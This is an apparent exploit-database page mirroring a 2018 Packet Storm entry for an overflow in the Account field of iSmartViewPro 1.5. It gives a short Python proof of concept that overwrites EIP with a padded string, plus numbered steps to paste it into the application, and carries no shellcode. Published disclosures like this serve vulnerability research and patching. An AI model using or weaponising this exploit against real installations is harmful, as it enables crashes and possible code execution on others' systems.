Lucene search
K

iSmartViewPro 1.5 Account Buffer Overflow

🗓️ 08 Aug 2018 00:00:00Reported by Alan Joaquin Baeza MezaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 48 Views

iSmartViewPro 1.5 Account Buffer Overflow discovered by Alan JoaquAn Baeza Meza in 2018. Exploit involves running a python code to create a buffer overflow in the software

Code
`# Exploit Title: iSmartViewPro 1.5 - 'Account' Buffer Overflow  
# Discovery by: Alan JoaquAn Baeza Meza  
# Discovery Date: 2018-08-07  
# Vendor Homepage: http://www.securimport.com/n/en/  
# Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/493-software-ismartviewpro-v1-5  
# Tested Version: 1.5  
# Tested on OS : Windows 10 Pro x64 es  
  
# Steps to Produce the BoF:   
# 1.- Run python code : python generatepaste.py  
# 2.- Open generate.txt and copy content to clipboard  
# 3.- Open iSmartViewPro  
# 4.- Add device manually  
# 5.- Device alias -> A  
# 6.- Device Type-> SmartP2P  
# 7.- DDNS/IP/DID-> 0.0.0.0  
# 8.- Paste ClipBoard on "Account"  
# 9.- Password -> A  
#10.- Aceptar  
#11.- BoF  
  
#!/usr/bin/env python  
# -*- coding: utf-8 -*-  
buffer = "\x41" * 479  
eip= "\x42" * 4  
f = open ("generate.txt", "w")  
f.write(buffer+eip)  
f.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation